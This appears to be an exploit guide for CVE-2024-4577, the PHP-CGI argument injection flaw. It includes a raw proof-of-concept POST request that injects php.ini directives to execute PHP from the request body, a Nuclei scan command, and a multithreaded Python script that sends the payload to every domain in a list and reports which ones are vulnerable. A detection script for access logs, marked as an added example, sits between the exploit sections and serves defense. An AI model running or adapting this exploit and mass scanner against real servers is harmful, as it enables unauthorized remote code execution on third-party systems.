CVE-2024-4577 Exploit Guide
How to Run the Python Script
First, let’s save the Python script with the name CVE-2024-4577.py. To run the script:
We need to ensure the requests library is installed. Run the following command:
pip install requests
Next, execute the script by passing in the domain list file as an argument:
python CVE-2024-4577.py /path/to/domains-list
(Optional) If we only want to display vulnerable hosts, we can run the script with the --quiet flag:
python CVE-2024-4577.py /path/to/domains-list --quiet
Proof of Concept (POC) Overview
To manually verify the vulnerability, we can send the following POST request:
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>
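On the detection side, the request shape shown above (a %AD byte standing in for the dash of a -d argument, followed by a php.ini directive) can be searched for in web server access logs. The following is an added example, not part of the original guide; the common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# "METHOD target HTTP/x.y" inside a common/combined access log entry (assumed format)
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Byte 0xAD standing in for '-', then 'd', a separator, and a "directive=" assignment
INJECTED_D_RE = re.compile(rb"\xadd[+ ]+[a-z_.]+=", re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2024:10:00:01 +0000] "POST /test.hello?%ADd+allow_url_include%3d1'
    '+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 85123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Jun/2024:10:00:05 +0000] "POST /test.hello?%25ADd+allow_url_include%3D1'
    '+%25ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 404 310 "-" "curl/8.3.0"',
    '192.0.2.10 - - [10/Jun/2024:10:01:12 +0000] "GET /index.php?d=1&mode=allow HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Jun/2024:10:02:40 +0000] "GET /search?q=co%C2%ADdesign+d=2 HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
]

def is_injection(query: str, rounds: int = 2) -> bool:
    """Percent-decode up to `rounds` times, checking each layer, so %25AD is caught like %AD."""
    raw = query.encode("utf-8", "replace")
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)
        if INJECTED_D_RE.search(raw):
            return True
    return False

def find_attempts(log_lines):
    """Return (client_ip, method, path) for each request whose query matches the PoC shape."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request entry
        path, _, query = m.group("target").partition("?")
        if query and is_injection(query):
            hits.append((m.group("ip"), m.group("method"), path))
    return hits

if __name__ == "__main__":
    for ip, method, path in find_attempts(SAMPLE_LOG):
        print(f"possible CVE-2024-4577 probe: {ip} {method} {path}")
```

A hit only shows that a request of this shape was received; the response status and size in the same log entry help separate probes that failed from ones that need follow-up.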
Nuclei Template for Scanning
A Nuclei template can streamline scanning for vulnerable instances. This template uses the v3 schema and has been verified in a controlled environment:
nuclei -t CVE-2024-4577.yaml -u <target-url>
Exploit.py
import requests
import threading
import sys
import argparse

max_threads = 10
semaphore = threading.Semaphore(max_threads)

def check_vulnerability(domain, quiet):
    url = f"{domain}/test.hello?%25ADd+allow_url_include%3D1+%25ADd+auto_prepend_file%3Dphp://input"
    headers = {
        "User-Agent": "curl/8.3.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "keep-alive"
    }
    data = "<?php phpinfo(); ?>"
    if not quiet:
        print(f"[!] Testing {domain}...")
        print("")
    try:
        response = requests.post(url, headers=headers, data=data, timeout=10, verify=False)
        if "PHP Version" in response.text:
            print(f"{domain}: Vulnerable")
        elif not quiet:
            print(f"{domain}: Not Vulnerable")
    except requests.RequestException as e:
        if not quiet:
            print(f"{domain}: Error making request: {e}")
    finally:
        semaphore.release()

def main(file_path, quiet):
    threads = []
    with open(file_path, 'r') as file:
        for line in file:
            domain = line.strip()
            if domain:
                semaphore.acquire()
                thread = threading.Thread(target=check_vulnerability, args=(domain, quiet))
                thread.start()
                threads.append(thread)
    for thread in threads:
        thread.join()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-4577 vulnerability.")
    parser.add_argument("file_path", help="Path to the domain list file")
    parser.add_argument("--quiet", action="store_true", help="Only print if the host is vulnerable")
    args = parser.parse_args()
    main(args.file_path, args.quiet)